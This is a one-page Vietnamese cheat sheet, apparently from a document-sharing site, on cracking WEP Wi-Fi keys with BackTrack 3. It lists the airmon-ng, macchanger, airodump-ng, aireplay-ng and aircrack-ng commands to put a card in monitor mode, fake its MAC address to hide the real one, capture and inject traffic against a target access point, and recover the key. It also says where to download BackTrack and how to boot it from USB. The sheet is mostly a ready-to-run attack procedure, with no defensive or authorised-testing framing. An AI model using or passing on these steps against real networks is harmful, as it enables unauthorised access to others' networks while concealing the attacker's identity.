Hack WEP

You might also like

Download as doc, pdf, or txt
Download as doc, pdf, or txt
You are on page 1of 1

TÓM LƯỢC HACK WEP BẰNG BACKTRACK3

A. Quy ước:
Quy ước Ý nghĩa
{wlan0} Tên wireless card (xem sau khi gõ lệnh iwconfig)
{fakeMAC} MAC giả (ví dụ, 00:11:22:33:44:55}
{sniff} Tên tập tin chứa các gói được bắt từ AP
{bssid} MAC của AP
{essid} Tên của AP
AP Access Point bị attach
Ví dụ:
command có cú pháp : airmon-ng start {wlan0}
được thực hiện gán giá trị theo trường hợp cụ thể : airmon-ng start eth0

B. Cấu hình wireless card :


Lệnh Diễn giải
airmon-ng xem chipset cua card wifi
iwconfig xem thông tin tất cả card mạng
airmon-ng stop {wlan0} Stop card wifi
ifconfig {wlan0} down Down card wifi (để change MAC)
macchanger --mac {fakeMAC} {wlan0} thay đổi địa chỉ mac address của card wifi (mục
đích dấu MAC thật)
airmon-ng start {wlan0} Khởi động card wifi ở chế độ monitor
airodump-ng {wlan0} Thu thập thông tin AP

C. Tiến hành crack wep:


Lệnh Diễn giải
airodump-ng -c -w {sniff} --bssid {bssid} {wlan0} Bắt dữ liệu
aireplay-ng -1 0 -a {bssid} -h {fakeMAC} {wlan0} Tăng cường luồng dữ liệu, rút ngắn
hoặc/và: thời gian attach
aireplay-ng -1 0 -a {bssid} -e {essid} -h {fakeMAC} {wlan0}
hoặc/và:
aireplay-ng -3 -b {bssid} -h {fakeMAC} {wlan0}
hoặc/và:
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b {bssid} -h
{fakeMAC} {wlan0}
aircrack-ng sniff-01.cap Crack (khi gói bắt được ~ 20.000)

D. Công cụ cần thiết:


1. Tập tin Backtrack3-final.iso, tải từ:
http://backtrack-linux.org.
2. Wiless card tương thích, tham khảo danh mục card tương thích:
http://backtrack.offensive-security.com/index.php/HCL:Wireless
Burn file iso vào CD (chạy từ CD), hoặc ghi USB disk để chạy từ USB disk.
Để ghi vào USB disk, thực hiện:
+ Tải công cụ “HP USB Disk Storage Format Tool” (miễn phí).
+ Dùng công cụ trên format USB disk (FAT32).
+ Giải nén file ISO vào USB disk.
+ Vào thư mục Boot, chạy tập tin Bootinst.bat để tạo tập tin khởi động cho USB disk.

You might also like